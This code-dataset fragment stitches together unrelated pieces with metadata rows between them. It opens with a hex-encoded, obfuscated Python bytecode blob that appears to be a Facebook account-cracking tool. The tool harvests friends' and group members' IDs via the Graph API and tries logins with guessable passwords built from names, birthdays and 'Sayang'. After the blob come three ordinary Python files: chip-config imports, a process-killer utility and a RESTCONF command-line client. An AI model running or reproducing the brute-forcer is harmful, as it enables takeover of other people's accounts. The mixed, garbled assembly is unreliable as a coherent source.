06E65777406000000757064617465740900000068657864696765737474080000007265717565737473740300000067657474040000006A736F6E74050000006C6F616473740400000074657874520E0000007405000000636C6F73657404000000706F7374740A000000657863657074696F6E735201000000520800000074050000006C6F67696E280B0000007405000000746F6B6574740200000069647403000000707764740300000075726C522C0000007404000000646174617401000000787401000000615218000000521200000074040000007A6564642800000000280000000073020000006467524C00000042000000738400000000010D0103010F010B0113010D010D010D0105010C01050105010C0105010501070103011101100105010D010B010C0110010D010D010A010C010C010301160153010F010D010C0114010601150112010F0111010A01050105010501050115020D010B0113010E020C0105010501050105010D010D010A0205010501050105010D010D01630000000000000000050000004300000073920000007400006A0100640100830100017919007402006402006403008302006A0300830000610400576E3700047405006B0A00725F0001010164040047487400006A0100640500830100017406006A070064060083010001740800830000016E0100587400006A0100640100830100017400006A0100640700830100017400006A010064080083010001740900830000016400005328090000004E520A00000073090000006C6F67696E2E747874521800000073200000001B5B313B39316D5B215D20546F6B656E20746964616B20646974656D756B616E7310000000726D202D7266206C6F67696E2E7478746901000000730C0000007368206E61726765742E73687307000000736820782E7368280A0000005205000000520B0000005231000000740400000072656164524D000000523400000052100000005211000000524C000000740B00000070696C69685F73757065722800000000280000000028000000007302000000646752320000008B000000731800000000020D01030119010D0105010D010D010B020D010D010D0163000000000C000000050000004300000073A7020000640100474864010047487400006402008301007D00007C00006403006B02007231006404004748740100830000016EAE017C00006405006B020072AF007402006A0300640600830100017402006A030064070083010001740400640800830100017405006A0600640900740700178301007D01007408006A09007C01006A0A008301007D02007856017C0200640A0019445D17007D0300740B006A0C007C0300640B001983010001719100576E30017C0000640C006B020072A8017402006A0300640600830100017402006A030064070083010001640D00640E00144748740000640F008301007D0400793E007405006A06006410007C04001764110017740700178301007D01007408006A09007C01006A0A008301007D05006412007C050064130019174748576E270004740D006B0A00725101010101641400474874000064150083010001740E00830000016E0100587405006A06006416007C04001764170017740700178301007D06007408006A09007C06006A0A008301007D0300785D007C0300640A0019445D17007D0700740B006A0C007C0700640B001983010001718A01576E37007C00006418006B020072CB017402006A030064190083010001740F00830000016E1400641A007C000017641B00174748740100830000017402006A0300640600830100017402006A0300641C0083010001641D00741000741100740B00830100830100174748740400641E0083010001641F006420006421006703007D08007830007C0800445D28007D09006422007C090017477412006A13006A1400830000017415006A160064230083010001712E0257487402006A0300642400830100016425008400007D0A007417006426008301007D0B007C0B006A18007C0A00740B0083020001642700474874000064280083010001740E00830000016400005328290000004E520900000073380000001B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D50696C696E204E6F201B5B33313B316D3A1B5B33393B316D20740000000073180000001B5B313B39316D5B215D204A616E67616E206B6F736F6E6774020000003031520A000000730C0000007368206E61726765742E7368733D0000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4D656E67616D62696C2069642074656D616E201B5B313B39376D2E2E2E733300000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F667269656E64733F6163636573735F746F6B656E3D5251000000524E000000740C0000003230303030303030303030306928000000730A0000001B5B313B39376DE29590732C0000001B5B313B39316D5B2B5D201B5B313B39326D494420477275702020201B5B313B39316D3A1B5B313B39376D20732500000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F67726F75702F3F69643D730E000000266163636573735F746F6B656E3D733C0000001B5B313B39316D5B1B5B313B39366DE29C931B5B313B39316D5D201B5B313B39326D4E616D612067727570201B5B313B39316D3A1B5B313B39376D2074040000006E616D65731F0000001B5B313B39316D5B215D204772757020746964616B20646974656D756B616E73210000000A1B5B313B39316D5B201B5B313B39376D4B656D62616C69201B5B313B39316D5D731B00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F73350000002F6D656D626572733F6669656C64733D6E616D652C6964266C696D69743D393939393939393939266163636573735F746F6B656E3D740200000030307310000000726D202D7266206C6F67696E2E74787473200000001B5B313B33396D5B1B5B33313B316D211B5B33393B316D5D201B5B313B39376D7318000000201B5B313B39316D50696C69682059616E672042656E61727307000000736820762E7368733A0000001B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4A756D6C6168204944201B5B313B39316D3A201B5B313B39356D73320000001B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4C6F6164696E67201B5B313B39376D2E2E2E73040000002E20202073040000002E2E202073040000002E2E2E2073410000000D0D1B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4D756C6169204D656E67616B736573204B656D616E616E201B5B313B39376D69010000007307000000736820622E736863010000000C000000030000005300000073CB0200007C00007D010079B7027400006A01006401007C01001764020017740200178301007D02007403006A04007C02006A05008301007D03007C030064030019640400177D04007406006A07006405007C010017640600177C040017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007296006409007C010017640A00177C040017640B001747486E2602640C007C0600640D00196B060072B600640E007C010017640B001747486E06027C030064030019640F00177D07007406006A07006405007C010017640600177C070017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007216016409007C010017640A00177C070017640B001747486EA601640C007C0600640D00196B0600723601640E007C010017640B001747486E86017C030064100019640400177D08007406006A07006405007C010017640600177C080017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007296016409007C010017640A00177C080017640B001747486E2601640C007C0600640D00196B060072B601640E007C010017640B001747486E06017C0300641100197D09007C09006A09006412006413008302007D0A007406006A07006405007C010017640600177C0A0017640700178301007D05007403006A08007C05008301007D06006408007C06006B06007224026409007C010017640A00177C0A0017640B001747486E9800640C007C0600640D00196B0600724402640E007C010017640B001747486E78007C0300641400197D0B007406006A07006405007C010017640600177C0B0017640700178301007D05007403006A08007C05008301007D06006408007C06006B060072A0026409007C010017640A00177C0B0017640B001747486E1C00640C007C0600640D00196B060072BC02640E007C01001747486E0000576E07000101016E0100586400005328150000004E731B00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F730F0000002F3F6163636573735F746F6B656E3D740A00000066697273745F6E616D657403000000313233739100000068747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D7317000000266C6F63616C653D656E5F55532670617373776F72643D73480000002673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D3366353535663939666236316663643761613063343466353866353232656636522F00000073310000001B5B313B33396D5B20201B5B33323B316D537563657373201B5B33393B316D5D201B5B33313B316D5B201B5B33363B316D7313000000201B5B33313B316D5D205B1B5B33393B316D207309000000201B5B33313B316D5D73100000007777772E66616365626F6F6B2E636F6D74090000006572726F725F6D736773310000001B5B313B33396D5B1B5B33313B316D4368656B706F696E741B5B33393B316D5D201B5B33313B316D5B201B5B33363B316D7405000000313233343574090000006C6173745F6E616D657408000000626972746864617974010000002F52570000007406000000536179616E67280A00000052440000005245000000524D000000524600000052470000005248000000740600000075726C6C6962740700000075726C6F70656E74040000006C6F616474070000007265706C616365280C00000074030000006172677404000000757365725253000000740100000062740500000070617373315251000000740100000071740500000070617373327405000000706173733374050000006C616869727405000000706173733474050000007061737335280000000028000000007302000000646774040000006D61696ED600000073540000000001060103011B0112010E011F010F010C011802100110020E011F010F010C011802100110020E011F010F010C011802100110020A0112011F010F010C011802100110020A011F010F010C011802100110030301691E00000073400000000A1B5B313B33396D5B1B5B33323B316D2B1B5B33393B316D5D201B5B313B39326D4861636B2046622054656D616E205375636573731B5B33393B316D202A5F2A735F0000000A1B5B33393B316D5B1B5B33323B316D2B1B5B33393B316D5D1B5B33323B316D4B656D62616C69204C616769201B5B33313B316D5B1B5B33343B316D591B5B33313B316D2F1B5B33343B316D541B5B33313B316D5D203A201B5B33393B316D2819000000523500000052560000005205000000520B000000521400000052440000005245000000524D000000524600000052470000005248000000524E0000007406000000617070656E64523300000052320000005208000000740300000073747274030000006C656E5206000000520D000000520F00000052100000005211000000520000000074030000006D6170280C00000074040000007065616B521800000052120000007401000000737403000000696467740300000061737774020000007265740100000069521500000052160000005272000000740100000070280000000028000000007302000000646752560000009C000000736A0000000001050105010C010C0105010A020C010D010D020A0113011201110118030C010D010D0109010C0103011B01120111010D0105010A010B021B011201110118030C010D010A020D0107010D010D0115010A010F010D0108010D01110201010D0209370C01100105010A01630100000004000000020000004300000073330000006401007C0000167D01007400006A01007C01008301007D02007402006A03007C02006A04008301007D03007C0300640200195328030000004E732D00000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D653F6163636573735F746F6B656E3D2573524E0000002805000000524400000052450000005246000000524700000052480000002804000000524D0000005250000000740300000072657374030000007569642800000000280000000073020000006467740A0000006765745F75736572696414010000730800000000010A010F011201630200000007000000060000004300000073090100007400007C00008301007D02006401007C01007401007C0200830100660200167D0300690200640200640300366404007C000016640500367D04006406007D05007402006A03007C05006407007C03006408007C04008301027D06007C06006A040047486409007C06006A04006B060072AE007405006A0600640A00830100017405006A0600640B0083010001640C00640D00144748640E004748740700640F0083010001740800830000016E57006410007C06006A04006B060072F9007405006A0600640A00830100017405006A0600640B0083010001640C00640D001447486411004748740700640F0083010001740800830000016E0C006412004748740900830000016400005328130000004E738A0100007661726961626C65733D7B2230223A7B2269735F736869656C646564223A2025732C2273657373696F6E5F6964223A2239623738313931632D383466642D346162362D623061612D313962333966303461366263222C226163746F725F6964223A222573222C22636C69656E745F6D75746174696F6E5F6964223A2262303331366464362D336664362D346265622D616564342D626232396335646336346230227D7D266D6574686F643D706F737426646F635F69643D313437373034333239323336373138332671756572795F6E616D653D4973536869656C6465645365744D75746174696F6E2673747269705F64656661756C74733D747275652673747269705F6E756C6C733D74727565266C6F63616C653D656E5F555326636C69656E745F636F756E7472795F636F64653D55532666625F6170695F7265715F667269656E646C795F6E616D653D4973536869656C6465645365744D75746174696F6E2666625F6170695F63616C6C65725F636C6173733D4973536869656C6465645365744D75746174696F6E73210000006170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564730C000000436F6E74656E742D5479706573080000004F41757468202573740D000000417574686F72697A6174696F6E732200000068747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6772617068716C525100000074070000006865616465727373120000002269735F736869656C646564223A74727565520A000000730C0000007368206E61726765742E73686928000000730A0000001B5B313B39376DE29590732C0000001B5B313B39316D5B1B5B313B39366DE29C931B5B313B39316D5D201B5B313B39326D4469616B7469666B616E73210000000A1B5B313B39316D5B201B5B313B39376D4B656D62616C69201B5B313B39316D5D73130000002269735F736869656C646564223A66616C7365732F0000001B5B313B39316D5B1B5B313B39366DE29C931B5B313B39316D5D201B5B313B39316D44696E6F6E616B7469666B616E73100000001B5B313B39316D5B215D204572726F72280A000000528000000052740000005244000000524A00000052480000005205000000520B000000523500000074040000006C61696E52080000002807000000524D0000007406000000656E61626C65524E000000525100000052820000005250000000527E0000002800000000280000000073020000006467740300000067617A1B010000732C00000000010C011601180106011B0108010F010D010D01090105010A010A020F010D010D01090105010A010A02050174080000005F5F6D61696E5F5F2802000000730A000000557365722D4167656E7473520000004F706572612F392E38302028416E64726F69643B204F70657261204D696E692F33322E302E323235342F38352E20553B206964292050726573746F2F322E31322E3432332056657273696F6E2F31322E3136283B00000052050000005206000000521000000074080000006461746574696D65740600000072616E646F6D5240000000527B0000007409000000746872656164696E67524600000074070000006765747061737352640000005244000000523700000074140000006D756C746970726F63657373696E672E706F6F6C5200000000741300000072657175657374732E657863657074696F6E7352010000005202000000740600000072656C6F6164741200000073657464656661756C74656E636F64696E67523600000074110000007365745F68616E646C655F726F626F7473740500000046616C736574120000007365745F68616E646C655F7265667265736874050000005F687474707414000000485454505265667265736850726F636573736F72740A000000616464686561646572735208000000520C0000005214000000520B000000521700000074040000006261636B7407000000746872656164737408000000626572686173696C740800000063656B706F696E747405000000676167616C7407000000696474656D616E740B000000696466726F6D74656D616E740500000069646D656D524E0000007402000000656D740B000000656D66726F6D74656D616E74020000006870740B000000687066726F6D74656D616E74060000007265616B7369740A0000007265616B73696772757074050000006B6F6D656E74090000006B6F6D656E6772757074080000006C69737467727570740600000076756C6E6F74740400000076756C6E524C0000005232000000525600000052800000005239000000528500000074080000005F5F6E616D655F5F2800000000280000000028000000007302000000646774080000003C6D6F64756C653E0200000073520000009C011002100110010A010D010C010D011C010C020904090809070D0209090601060106010601060106010601060106010601060106010601060106010601060106010601060309490911097809070C1B0C01")))
| 1,780.384615 | 22,731 | 0.988464 | 38 | 23,145 | 602.052632 | 0.815789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.877968 | 0.006524 | 23,145 | 12 | 22,732 | 1,928.75 | 0.116987 | 0.012227 | 0 | 0 | 0 | 0 | 0.996705 | 0.996705 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
8ce42ce5da6cf10297aef34237f89af5d9e36904 | 312 | py | Python | platform/hwconf_data/efr32zg14p/modules/WTIMER0/__init__.py | lenloe1/v2.7 | 9ac9c4a7bb37987af382c80647f42d84db5f2e1d | [
"Zlib"
] | null | null | null | platform/hwconf_data/efr32zg14p/modules/WTIMER0/__init__.py | lenloe1/v2.7 | 9ac9c4a7bb37987af382c80647f42d84db5f2e1d | [
"Zlib"
] | 1 | 2020-08-25T02:36:22.000Z | 2020-08-25T02:36:22.000Z | platform/hwconf_data/efr32zg14p/modules/WTIMER0/__init__.py | lenloe1/v2.7 | 9ac9c4a7bb37987af382c80647f42d84db5f2e1d | [
"Zlib"
] | 1 | 2020-08-25T01:56:04.000Z | 2020-08-25T01:56:04.000Z | import efr32zg14p.halconfig.halconfig_types as halconfig_types
import efr32zg14p.halconfig.halconfig_dependency as halconfig_dependency
import efr32zg14p.PythonSnippet.ExporterModel as ExporterModel
import efr32zg14p.PythonSnippet.RuntimeModel as RuntimeModel
import efr32zg14p.PythonSnippet.Metadata as Metadata | 62.4 | 72 | 0.907051 | 34 | 312 | 8.205882 | 0.294118 | 0.286738 | 0.311828 | 0.243728 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068259 | 0.060897 | 312 | 5 | 73 | 62.4 | 0.883959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
506fcd125e7f108bbe1d19547937ec5e6fd59499 | 4,976 | py | Python | tasker/devices/killer.py | adir-intsights/tasker | 7e7eb3b375a6f5317d0bcbbc40426baa676d51f5 | [
"Apache-2.0"
] | null | null | null | tasker/devices/killer.py | adir-intsights/tasker | 7e7eb3b375a6f5317d0bcbbc40426baa676d51f5 | [
"Apache-2.0"
] | null | null | null | tasker/devices/killer.py | adir-intsights/tasker | 7e7eb3b375a6f5317d0bcbbc40426baa676d51f5 | [
"Apache-2.0"
] | null | null | null | import time
import threading
import multiprocessing
import os
import psutil
class LocalKiller:
def __init__(
self,
pid,
soft_timeout,
soft_timeout_signal,
hard_timeout,
hard_timeout_signal,
critical_timeout,
critical_timeout_signal,
memory_limit,
memory_limit_signal,
):
self.sleep_interval = 0.5
self.soft_timeout = soft_timeout
self.hard_timeout = hard_timeout
self.critical_timeout = critical_timeout
self.memory_limit = memory_limit
self.soft_timeout_signal = soft_timeout_signal
self.hard_timeout_signal = hard_timeout_signal
self.critical_timeout_signal = critical_timeout_signal
self.memory_limit_signal = memory_limit_signal
self.time_elapsed = 0.0
self.stop_event = threading.Event()
self.stop_event.clear()
self.created = False
self.pid_to_kill = pid
def killing_loop(
self,
):
while self.stop_event.wait():
if not psutil.pid_exists(self.pid_to_kill):
return
process = psutil.Process(self.pid_to_kill)
if self.memory_limit != 0 and process.memory_info().rss >= self.memory_limit:
os.kill(self.pid_to_kill, self.memory_limit_signal)
if self.soft_timeout != 0 and self.time_elapsed >= self.soft_timeout:
os.kill(self.pid_to_kill, self.soft_timeout_signal)
if self.hard_timeout != 0 and self.time_elapsed >= self.hard_timeout:
os.kill(self.pid_to_kill, self.hard_timeout_signal)
if self.critical_timeout != 0 and self.time_elapsed >= self.critical_timeout:
os.kill(self.pid_to_kill, self.critical_timeout_signal)
time.sleep(self.sleep_interval)
self.time_elapsed += self.sleep_interval
def start(
self,
):
if not self.created:
killing_loop_thread = threading.Thread(
target=self.killing_loop,
)
killing_loop_thread.daemon = True
killing_loop_thread.start()
self.created = True
self.stop_event.set()
def stop(
self,
):
self.stop_event.clear()
def reset(
self,
):
self.time_elapsed = 0.0
def __del__(
self,
):
self.stop()
class RemoteKiller:
def __init__(
self,
pid,
soft_timeout,
soft_timeout_signal,
hard_timeout,
hard_timeout_signal,
critical_timeout,
critical_timeout_signal,
memory_limit,
memory_limit_signal,
):
self.sleep_interval = 0.5
self.soft_timeout = soft_timeout
self.hard_timeout = hard_timeout
self.critical_timeout = critical_timeout
self.memory_limit = memory_limit
self.soft_timeout_signal = soft_timeout_signal
self.hard_timeout_signal = hard_timeout_signal
self.critical_timeout_signal = critical_timeout_signal
self.memory_limit_signal = memory_limit_signal
self.time_elapsed = multiprocessing.Value('d', 0.0)
self.stop_event = multiprocessing.Event()
self.stop_event.clear()
self.created = False
self.pid_to_kill = pid
def killing_loop(
self,
):
while self.stop_event.wait():
if not psutil.pid_exists(self.pid_to_kill):
return
process = psutil.Process(self.pid_to_kill)
if self.memory_limit != 0 and process.memory_info().rss >= self.memory_limit:
os.kill(self.pid_to_kill, self.memory_limit_signal)
with self.time_elapsed.get_lock():
if self.soft_timeout != 0 and self.time_elapsed.value >= self.soft_timeout:
os.kill(self.pid_to_kill, self.soft_timeout_signal)
if self.hard_timeout != 0 and self.time_elapsed.value >= self.hard_timeout:
os.kill(self.pid_to_kill, self.hard_timeout_signal)
if self.critical_timeout != 0 and self.time_elapsed.value >= self.critical_timeout:
os.kill(self.pid_to_kill, self.critical_timeout_signal)
self.time_elapsed.value += self.sleep_interval
time.sleep(self.sleep_interval)
def start(
self,
):
if not self.created:
killing_loop_process = multiprocessing.Process(
target=self.killing_loop,
)
killing_loop_process.daemon = True
killing_loop_process.start()
self.created = True
self.stop_event.set()
def stop(
self,
):
self.stop_event.clear()
def reset(
self,
):
with self.time_elapsed.get_lock():
self.time_elapsed.value = 0.0
def __del__(
self,
):
self.stop()
| 27.191257 | 99 | 0.60832 | 588 | 4,976 | 4.807823 | 0.096939 | 0.110364 | 0.074284 | 0.064379 | 0.890343 | 0.853555 | 0.812522 | 0.798373 | 0.793067 | 0.767598 | 0 | 0.005865 | 0.314711 | 4,976 | 182 | 100 | 27.340659 | 0.823167 | 0 | 0 | 0.808511 | 0 | 0 | 0.000201 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085106 | false | 0 | 0.035461 | 0 | 0.148936 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
50ad06818bebe6fb9c8833f1d3fa47cba872b3c6 | 12,299 | py | Python | nettowel/cli/restconf.py | InfrastructureAsCode-ch/nettowel | 1b14ae7d253d1c9435a3c18a65078122fb4965dd | [
"Apache-2.0"
] | 1 | 2022-02-22T12:05:42.000Z | 2022-02-22T12:05:42.000Z | nettowel/cli/restconf.py | InfrastructureAsCode-ch/nettowel | 1b14ae7d253d1c9435a3c18a65078122fb4965dd | [
"Apache-2.0"
] | null | null | null | nettowel/cli/restconf.py | InfrastructureAsCode-ch/nettowel | 1b14ae7d253d1c9435a3c18a65078122fb4965dd | [
"Apache-2.0"
] | null | null | null | from typing import Union
import sys
import typer
from urllib.parse import quote
from rich import print_json, print
from rich.syntax import Syntax
from rich.prompt import Prompt
from rich.json import JSON
from rich.panel import Panel
from nettowel.cli._common import get_typer_app, auto_complete_paths
from nettowel.exceptions import (
NettowelRestconfError,
)
from nettowel.restconf import send_request
app = get_typer_app(help="RESTCONF functions")
def _send_request(
path: str,
method: str,
host: str,
user: str,
password: str,
port: int,
send_xml: bool,
return_xml: bool,
json: bool,
raw: bool,
verify: bool,
data_file: typer.FileText = None,
) -> None:
try:
if not user:
user = Prompt.ask("Enter username")
if not password:
password = Prompt.ask(f"Enter password for user {user}", password=True)
if data_file:
if data_file == "-":
data = sys.stdin.read()
else:
with open(data_file) as f: # type: ignore
data = f.read()
else:
data = None
result = send_request(
method=method,
url=f"https://{host}:{port}/restconf/data/{path}",
username=user,
password=password,
send_xml=send_xml,
return_xml=return_xml,
verify=verify,
data=data,
)
if raw:
print(result)
elif json:
print_json(data=result)
else:
if return_xml:
output: Union[Syntax, JSON] = Syntax(
result,
"xml",
line_numbers=True,
indent_guides=True,
)
else:
output = JSON.from_data(result)
print(
Panel(
output,
title=f"[yellow][bold]{method}[/bold] {path}",
border_style="blue",
)
)
raise typer.Exit(0)
except NettowelRestconfError as exc:
typer.echo(str(exc), err=True)
if exc.server_msg:
typer.echo(exc.server_msg, err=True)
raise typer.Exit(1)
@app.command()
def get(
ctx: typer.Context,
path: str = typer.Argument(
..., help="RESTCONF path. Example: Cisco-IOS-XE-native:native/hostname"
),
host: str = typer.Option(
..., help="Hostname or IP address", envvar="NETTOWEL_HOST"
),
user: str = typer.Option(None, help="Username for login", envvar="NETTOWEL_USER"),
password: str = typer.Option(
None, help="Login password", envvar="NETTOWEL_PASSWORD"
),
port: int = typer.Option(
default=443, help="Connection Port", envvar="NETTOWEL_RESTCONF_PORT"
),
send_xml: bool = typer.Option(
False,
"--send-xml",
help="Send XML instead of JSON",
),
return_xml: bool = typer.Option(
False,
"--return-xml",
help="Recieve XML instead of JSON",
),
verify: bool = typer.Option(
False,
"--no-verify",
help="Ignore SSL certificate verification",
envvar="NETTOWEL_VERIFY",
),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
_send_request(
path=path,
method="GET",
host=host,
user=user,
password=password,
port=port,
send_xml=send_xml,
return_xml=return_xml,
json=json,
raw=raw,
verify=verify,
)
@app.command()
def delete(
ctx: typer.Context,
path: str = typer.Argument(
..., help="RESTCONF path. Example: Cisco-IOS-XE-native:native/hostname"
),
host: str = typer.Option(
..., help="Hostname or IP address", envvar="NETTOWEL_HOST"
),
user: str = typer.Option(None, help="Username for login", envvar="NETTOWEL_USER"),
password: str = typer.Option(
None, help="Login password", envvar="NETTOWEL_PASSWORD"
),
port: int = typer.Option(
default=443, help="Connection Port", envvar="NETTOWEL_RESTCONF_PORT"
),
send_xml: bool = typer.Option(
False,
"--send-xml",
help="Send XML instead of JSON",
),
return_xml: bool = typer.Option(
False,
"--return-xml",
help="Recieve XML instead of JSON",
),
verify: bool = typer.Option(
False,
"--no-verify",
help="Ignore SSL certificate verification",
envvar="NETTOWEL_VERIFY",
),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
_send_request(
path=path,
method="DELETE",
host=host,
user=user,
password=password,
port=port,
send_xml=send_xml,
return_xml=return_xml,
json=json,
verify=verify,
raw=raw,
)
@app.command()
def post(
ctx: typer.Context,
path: str = typer.Argument(
..., help="RESTCONF path. Example: Cisco-IOS-XE-native:native/hostname"
),
data_file: typer.FileText = typer.Argument(
...,
exists=True,
file_okay=True,
dir_okay=False,
readable=True,
resolve_path=True,
allow_dash=True,
metavar="DATA",
help="Data to send. Use '-' to read from stdin",
autocompletion=auto_complete_paths,
),
host: str = typer.Option(
..., help="Hostname or IP address", envvar="NETTOWEL_HOST"
),
user: str = typer.Option(None, help="Username for login", envvar="NETTOWEL_USER"),
password: str = typer.Option(
None, help="Login password", envvar="NETTOWEL_PASSWORD"
),
port: int = typer.Option(
default=443, help="Connection Port", envvar="NETTOWEL_RESTCONF_PORT"
),
send_xml: bool = typer.Option(
False,
"--send-xml",
help="Send XML instead of JSON",
),
return_xml: bool = typer.Option(
False,
"--return-xml",
help="Recieve XML instead of JSON",
),
verify: bool = typer.Option(
False,
"--no-verify",
help="Ignore SSL certificate verification",
envvar="NETTOWEL_VERIFY",
),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
_send_request(
path=path,
method="POST",
host=host,
user=user,
password=password,
port=port,
send_xml=send_xml,
return_xml=return_xml,
json=json,
raw=raw,
verify=verify,
data_file=data_file,
)
@app.command()
def PUT(
ctx: typer.Context,
path: str = typer.Argument(
..., help="RESTCONF path. Example: Cisco-IOS-XE-native:native/hostname"
),
data_file: typer.FileText = typer.Argument(
...,
exists=True,
file_okay=True,
dir_okay=False,
readable=True,
resolve_path=True,
allow_dash=True,
metavar="DATA",
help="Data to send. Use '-' to read from stdin",
autocompletion=auto_complete_paths,
),
host: str = typer.Option(
..., help="Hostname or IP address", envvar="NETTOWEL_HOST"
),
user: str = typer.Option(None, help="Username for login", envvar="NETTOWEL_USER"),
password: str = typer.Option(
None, help="Login password", envvar="NETTOWEL_PASSWORD"
),
port: int = typer.Option(
default=443, help="Connection Port", envvar="NETTOWEL_RESTCONF_PORT"
),
send_xml: bool = typer.Option(
False,
"--send-xml",
help="Send XML instead of JSON",
),
return_xml: bool = typer.Option(
False,
"--return-xml",
help="Recieve XML instead of JSON",
),
verify: bool = typer.Option(
False,
"--no-verify",
help="Ignore SSL certificate verification",
envvar="NETTOWEL_VERIFY",
),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
_send_request(
path=path,
method="PUT",
host=host,
user=user,
password=password,
port=port,
send_xml=send_xml,
return_xml=return_xml,
json=json,
raw=raw,
verify=verify,
data_file=data_file,
)
@app.command()
def patch(
ctx: typer.Context,
path: str = typer.Argument(
..., help="RESTCONF path. Example: Cisco-IOS-XE-native:native/hostname"
),
data_file: typer.FileText = typer.Argument(
...,
exists=True,
file_okay=True,
dir_okay=False,
readable=True,
resolve_path=True,
allow_dash=True,
metavar="DATA",
help="Data to send. Use '-' to read from stdin",
autocompletion=auto_complete_paths,
),
host: str = typer.Option(
..., help="Hostname or IP address", envvar="NETTOWEL_HOST"
),
user: str = typer.Option(None, help="Username for login", envvar="NETTOWEL_USER"),
password: str = typer.Option(
None, help="Login password", envvar="NETTOWEL_PASSWORD"
),
port: int = typer.Option(
default=443, help="Connection Port", envvar="NETTOWEL_RESTCONF_PORT"
),
send_xml: bool = typer.Option(
False,
"--send-xml",
help="Send XML instead of JSON",
),
return_xml: bool = typer.Option(
False,
"--return-xml",
help="Recieve XML instead of JSON",
),
verify: bool = typer.Option(
False,
"--no-verify",
help="Ignore SSL certificate verification",
envvar="NETTOWEL_VERIFY",
),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
_send_request(
path=path,
method="PATCH",
host=host,
user=user,
password=password,
port=port,
send_xml=send_xml,
return_xml=return_xml,
json=json,
raw=raw,
verify=verify,
data_file=data_file,
)
@app.command()
def head(
ctx: typer.Context,
path: str = typer.Argument(
..., help="RESTCONF path. Example: Cisco-IOS-XE-native:native/hostname"
),
host: str = typer.Option(
..., help="Hostname or IP address", envvar="NETTOWEL_HOST"
),
user: str = typer.Option(None, help="Username for login", envvar="NETTOWEL_USER"),
password: str = typer.Option(
None, help="Login password", envvar="NETTOWEL_PASSWORD"
),
port: int = typer.Option(
default=443, help="Connection Port", envvar="NETTOWEL_RESTCONF_PORT"
),
send_xml: bool = typer.Option(
False,
"--send-xml",
help="Send XML instead of JSON",
),
return_xml: bool = typer.Option(
False,
"--return-xml",
help="Recieve XML instead of JSON",
),
verify: bool = typer.Option(
False,
"--no-verify",
help="Ignore SSL certificate verification",
envvar="NETTOWEL_VERIFY",
),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
_send_request(
path=path,
method="HEAD",
host=host,
user=user,
password=password,
port=port,
send_xml=send_xml,
return_xml=return_xml,
json=json,
raw=raw,
verify=verify,
)
@app.command()
def endcode(
ctx: typer.Context,
text: str = typer.Argument(..., help="Text to encode / quote"),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
result = quote(text, safe="")
if json:
print_json(data={"result": result})
elif raw:
print(result)
else:
print(Panel(result, title=f"[yellow]{text}", border_style="blue"))
if __name__ == "__main__":
app()
